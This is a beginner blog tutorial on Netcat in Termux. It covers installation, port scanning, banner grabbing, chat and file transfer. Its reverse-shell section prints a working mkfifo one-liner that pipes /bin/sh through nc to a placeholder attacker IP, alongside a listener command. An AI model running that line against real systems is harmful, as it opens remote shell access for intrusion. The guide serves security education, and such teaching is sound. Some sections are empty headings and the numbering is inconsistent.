Termux · Ethical Hacking · Android

How to Use Netcat (nc) in Termux — Complete Beginner's Guide

📅 March 24, 2026 👤 Rixon Xavier ⏱ 22 min read 📝 5,500+ words

🆓 Free 🤖 No Root Required 📱 Android ✅ Tested 2026

// 01 — Introduction: What Is Netcat and Why Learn It in Termux?

If you are serious about learning cybersecurity, Linux networking, or ethical hacking on Android, Netcat in Termux is one of the very first tools you need to master. Netcat — commonly abbreviated as nc — is a lightweight, blazing-fast, and incredibly versatile networking utility that security professionals worldwide call the "Swiss Army Knife of networking." It has been around since the 1990s, yet it remains one of the most essential tools in any penetration tester's toolkit in 2026.

So what exactly can Netcat do? In short: almost anything involving TCP or UDP network connections. You can use it to open raw connections between two machines, scan ports, transfer files, send and receive data, create simple chat systems, debug network services, and even set up basic listener shells for educational penetration testing labs. All of this is possible right from your Android phone inside Termux — no root required.

In this complete beginner's guide, Rixon Xavier walks you through everything you need to know about using Netcat in Termux from scratch. We'll cover installation, every important flag and option, practical use cases with real command examples, common errors you'll encounter and exactly how to fix them, and pro tips that most tutorials skip entirely. Whether you're a total beginner just getting comfortable with the Termux terminal or someone building their ethical hacking lab on Android, this guide has everything you need.

By the end of this post, you will be able to confidently use nc for port scanning, file transfers, chat sessions, banner grabbing, and understand how it fits into real-world cybersecurity workflows. This guide is part of the free educational series at hydratermux.blogspot.com, where we break down complex security tools into simple, step-by-step Android tutorials.

Let's dive in. Before anything else, make sure you have Termux installed from F-Droid (the official, up-to-date source) and that you have run pkg update && pkg upgrade to keep your packages current. Now let's get Netcat installed and start learning.

// 02 — Installing Netcat in Termux

Installing Netcat in Termux is refreshingly simple compared to many other security tools. Termux uses the pkg package manager (which is built on top of apt), and Netcat is available directly in the official Termux repositories. You don't need any third-party repos, GitHub clones, or compilation steps for the basic version.

Step 1 — Update Your Package Lists

Always start by updating your package lists to make sure you're pulling the latest versions of everything. Skipping this step is one of the most common reasons beginners run into dependency errors.

pkg update && pkg upgrade -y

This command updates the list of available packages (pkg update) and then upgrades any installed packages that have newer versions (pkg upgrade -y). The -y flag automatically confirms all prompts so you don't have to keep pressing Enter.

Step 2 — Install Netcat

There are actually two versions of Netcat available in Termux: the classic netcat package and the more feature-rich ncat (which comes bundled with Nmap). For most beginner use cases, the standard netcat package is perfect.

pkg install netcat-openbsd -y

pkg install nmap -y

Step 3 — Verify the Installation

After installation, verify that Netcat is correctly installed and accessible from your PATH.

nc -h

You should see output similar to this:

OpenBSD netcat (Debian patchlevel 1.226)
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
          [-m minttl] [-O length] [-P proxy_username] [-p source_port]
          [-q seconds] [-s sourceaddr] [-T keyword] [-V rtable] [-W recvlimit]
          [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]]
          [destination] [port]

You can also check the version and the exact binary location:

which nc
nc --version

Netcat doesn't print a --version flag like most tools, but which nc will confirm the binary path (usually /data/data/com.termux/files/usr/bin/nc on Termux). Everything is stored within Termux's own prefix, so no root access is needed at any point.

// 03 — Basic Netcat Syntax and All Important Flags Explained

Understanding Netcat's syntax and flags is critical before you start using it for real tasks. Many beginners just copy-paste commands without knowing what each part does — and then get confused when something doesn't work as expected. In this section, we'll break down the full syntax and every flag you'll commonly use when running Netcat in Termux.

The Basic Syntax

nc [options] [hostname/IP] [port]

At its core, Netcat takes a target (hostname or IP address) and a port number, and opens a raw TCP (or UDP) connection to it. That's the foundation. Everything else is built on top of that simple idea.

Most Important Flags

Connect to a Remote Host

The simplest thing you can do with Netcat is open a raw TCP connection to any IP and port:

nc -v google.com 80

This connects to Google's web server on port 80 (HTTP). The -v flag gives you verbose output so you can see whether the connection succeeded. Once connected, you can manually type an HTTP request:

GET / HTTP/1.0
Host: google.com
[press Enter twice]

Google's server will respond with raw HTTP headers and HTML — this is how you manually test web servers without a browser. This is also called banner grabbing in security testing — retrieving the service banner to identify what software and version is running on a port.

Start a Listener

To make Netcat listen on a specific port (waiting for incoming connections):

nc -lvp 4444

Breaking this down: -l means listen mode, -v means verbose, and -p 4444 means listen on port 4444. You can combine short flags like -lvp for convenience. Netcat will sit and wait until something connects to port 4444 on your device.

// 04 — Using Netcat in Termux as a Port Scanner

One of the most practical everyday uses of Netcat in Termux is quick port scanning. While tools like Nmap are far more powerful for comprehensive scans, Netcat's -z (zero I/O) mode lets you rapidly check whether specific ports are open on a target — and it does this using nothing but the built-in nc command you already installed.

Port scanning is a foundational skill in network administration and ethical hacking. Before you can test a service, you need to know it's running and on what port. Netcat gives you a fast, no-frills way to do this right from your Android terminal.

Scan a Single Port

To check if a single port is open on a target, use the -z flag (zero I/O — connect but send no data) combined with -v for output:

nc -zv 192.168.1.1 80

Example output when port is open:

Connection to 192.168.1.1 80 port [tcp/http] succeeded!

Example output when port is closed:

nc: connect to 192.168.1.1 port 80 (tcp) failed: Connection refused

This is clean and clear — either the port is open (succeeded) or closed/filtered (failed/timed out).

Scan a Range of Ports

Netcat supports port range scanning natively. Just specify the start and end ports separated by a dash:

nc -zv 192.168.1.1 20-100

This scans ports 20 through 100 on the target IP. Netcat will try each port in turn and report open ones. For scanning larger ranges quickly, add a short timeout with -w 1 so Netcat doesn't wait too long on filtered/unresponsive ports:

nc -zvn -w 1 192.168.1.1 1-1000

Here -n skips DNS resolution (faster since we're using an IP directly) and -w 1 sets a 1-second timeout per port. This scans the first 1000 ports fairly quickly.

Scan Specific Well-Known Ports

You can check multiple specific ports at once by looping with bash:

for port in 22 80 443 3306 8080 8443; do
  nc -zv -w 1 192.168.1.1 $port 2>&1
done

This loops through the most common service ports: SSH (22), HTTP (80), HTTPS (443), MySQL (3306), and alternate HTTP ports (8080, 8443). The 2>&1 redirects stderr to stdout so you see all output in one place.

Banner Grabbing with Netcat

Banner grabbing means connecting to a port and reading whatever the service sends back to identify it. This is incredibly useful in security assessments:

echo "" | nc -v -w 2 192.168.1.1 22

Against an SSH server, you'd see something like:

SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6

That single line tells you the SSH version, the OS, and the Ubuntu version — all without logging in. This is exactly how penetration testers start building a picture of their target environment.

// 05 — Netcat for Chat Sessions and File Transfer in Termux

Two of the most practical and beginner-friendly use cases for Netcat in Termux are setting up a simple two-way chat between devices and transferring files over the network. Both of these work beautifully on a local Wi-Fi network with no additional software needed — just nc on both ends. These exercises are also perfect for understanding how raw TCP connections actually work in practice.

Creating a Simple Chat Between Two Devices

This is one of the coolest beginner experiments you can do. You need two devices on the same network — for example, your Android phone running Termux and your laptop, or two Android devices both running Termux.

# On Device A (e.g., your phone at 192.168.1.50)
nc -lvp 5555

# On Device B (laptop, second phone, etc.)
nc 192.168.1.50 5555

Once Device B connects, both terminals enter a two-way chat mode. Anything you type on either device and press Enter sends immediately to the other. It's raw, it's fast, and it teaches you exactly how unencrypted TCP communication works at the application layer. Type Ctrl+C on either end to close the connection.

Transferring Files with Netcat

Netcat is excellent for quick file transfers on a local network — no FTP, SCP, or cloud storage needed. The principle is the same as the chat: one side listens, one side connects and pipes data.

# Receiver (Device A) — saves incoming data to received_file.txt
nc -lvp 9999 > received_file.txt

# Sender (Device B) — sends myfile.txt to Device A
nc -w 3 192.168.1.50 9999 < myfile.txt

The -w 3 flag makes Netcat close the connection automatically 3 seconds after the file finishes sending (otherwise it would wait indefinitely). On the receiving end, once the connection closes, received_file.txt will contain the exact contents of myfile.txt.

Transferring Entire Directories with tar + Netcat

You can even transfer whole folders by combining tar (for archiving) with Netcat's pipe:

# Receiver
nc -lvp 9998 | tar xvf -

# Sender
tar cvf - /path/to/folder | nc -w 3 192.168.1.50 9998

The sender archives the folder to stdout (- means stdout/stdin in tar), which gets piped directly into the Netcat connection. The receiver unpipes what it receives straight into tar for extraction. Clean, fast, and completely self-contained.

// 06 — Netcat Reverse Shells — Educational Overview for Ethical Hacking Students

In cybersecurity education and ethical penetration testing, understanding reverse shells is a core concept. A reverse shell is when a target machine initiates a connection back to the attacker's machine (the "listener"), effectively giving the penetration tester a command-line interface on the target. This technique is commonly tested in CTF (Capture The Flag) competitions, penetration testing labs like Hack The Box, TryHackMe, and DVWA setups.

This section is purely educational — to help you understand how these concepts work so you can recognize and defend against them, and succeed in CTF challenges and security certifications. Only ever practice these techniques on your own systems or in legally authorized lab environments.

Why Reverse Shells Instead of Bind Shells?

A bind shell opens a listener on the target that the attacker connects to. A reverse shell has the target connect outward to the attacker's listener. Reverse shells are preferred in real-world pentesting because firewalls typically block incoming connections to random ports — but they usually allow outgoing connections. Understanding this distinction is important for network defense and firewall rule design.

Basic Netcat Listener Setup (Lab Environment)

In a controlled lab — for example, two VMs you own, or your Termux device connecting to a Kali Linux VM — you would set up the attacker side listener like this:

# On your machine (the listener / "attacker" in a lab)
nc -lvnp 4444

The flags here: -l listen, -v verbose, -n no DNS resolution, -p 4444 on port 4444. This simply waits for an incoming connection.

The OpenBSD Netcat Limitation

An important thing to know: the OpenBSD variant of Netcat (which is what netcat-openbsd in Termux uses) deliberately does not include the -e flag (execute). The -e flag (execute a program on connect) was removed from OpenBSD Netcat specifically as a security measure.

This is why you'll see CTF writeups using the traditional (GNU) Netcat or alternative tools like ncat (from Nmap) or socat for reverse shell exercises. If you need -e functionality in Termux, install ncat via pkg install nmap, or use socat (pkg install socat).

Alternative: Using mkfifo for a Reverse Shell Without -e

Even without the -e flag, you can create a shell connection using named pipes (mkfifo). This is a classic CTF technique worth understanding:

# Lab exercise only — run on your own test machine
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc YOUR_IP 4444 > /tmp/f

Breaking this down for learning purposes: mkfifo /tmp/f creates a named pipe. The shell's output feeds through Netcat to the listener, and input from the listener feeds back through the pipe to the shell. This creates a bidirectional interactive shell over a plain Netcat connection — no -e flag needed.

Practicing Safely: Recommended Lab Environments

If you want to practice these concepts legally and safely, here are the recommended environments:

// 07 — Common Errors When Using Netcat in Termux and How to Fix Them

Even experienced users run into errors with Netcat from time to time. Here are the most common issues beginners face when using Netcat in Termux, with exact fixes for each one.

Error 1: "command not found: nc"

bash: nc: command not found

Cause: Netcat isn't installed yet, or the installation failed silently.
Fix: Run pkg install netcat-openbsd -y and verify with which nc.

Error 2: "Connection refused"

nc: connect to 192.168.1.1 port 4444 (tcp) failed: Connection refused

Cause: No listener is running on the target port, or a firewall is blocking it.
Fix: Confirm the listener is actually running on the target with nc -lvp 4444. Check that you have the right IP address. Make sure no firewall is blocking the port.

Error 3: nc -e flag not working

nc: invalid option -- 'e'

Cause: You're using the OpenBSD variant of Netcat, which doesn't support -e.
Fix: Use ncat instead (install via pkg install nmap) or use the mkfifo method described in Section 5.

Error 4: "Address already in use"

nc: bind failed: Address already in use

Cause: Another process is already using that port, or a previous Netcat listener is still running in the background.
Fix: Find and kill the process using that port: fuser -k 4444/tcp or just choose a different port number.

Error 5: Listener exits immediately after first connection

Cause: Default Netcat listener behavior — it closes after the first client disconnects.
Fix: Add the -k flag to keep the listener running: nc -lvkp 4444. Note: -k is available in OpenBSD nc.

Error 6: File transfer incomplete or corrupted

Cause: The sender closed before the receiver finished writing, or the -w timeout was too short.
Fix: Increase the timeout: nc -w 10 instead of -w 1. For large files, consider using pv (pipe viewer) to monitor progress: pkg install pv, then cat file | pv | nc ....

// 08 — Pro Tips for Getting the Most Out of Netcat in Termux

These are the tips and tricks that most basic tutorials skip — but they'll save you time, help you debug faster, and make you look like you really know what you're doing in the terminal.

// 09 — Netcat vs Ncat vs Socat — Full Comparison

Now that you're comfortable with Netcat, it's worth knowing where it fits among related tools. Here's a clear comparison of the three most commonly used raw connection tools in Termux and Linux security work:

Bottom line: Start with netcat-openbsd for learning the fundamentals. Move to ncat when you need SSL support or the -e flag for CTF challenges. Use socat when you need advanced socket relay, serial port communication, or complex bidirectional tunnels in lab work.

// 11 — Conclusion: Master Netcat, Master Networking

You've made it through the complete guide to using Netcat in Termux — from installation all the way through port scanning, file transfers, chat sessions, reverse shell theory, error fixing, and pro tips. Netcat might look simple on the surface, but as you've seen, it's an incredibly versatile tool that underpins real-world networking and security work at every level.

Here's a quick recap of everything you can now do with nc in Termux: install and verify Netcat without root, understand every important flag and what it does, scan individual ports or port ranges with zero I/O mode, grab service banners to identify running software, set up two-way chat sessions between devices, transfer files and entire directories over your local network, and understand the educational concepts behind listeners and reverse shells for CTF practice.

The key thing to remember is that Netcat is a learning tool as much as it is a practical utility. Every time you use it, you're building a deeper understanding of how TCP/IP networking actually works — knowledge that directly applies to network administration, security engineering, and penetration testing. The more you experiment with it in your own lab environments, the more intuitive networking concepts will become.

If you want to go deeper, the natural next steps are learning ncat (for SSL-capable connections), socat (for complex socket relays), and Nmap (for comprehensive port scanning with service detection). All of these are covered in free tutorials right here on this blog.

Found this guide helpful? Drop a comment below, share it with a fellow Termux learner, and subscribe to the blog for new tutorials every week. Your feedback helps us make better content for the entire Termux community.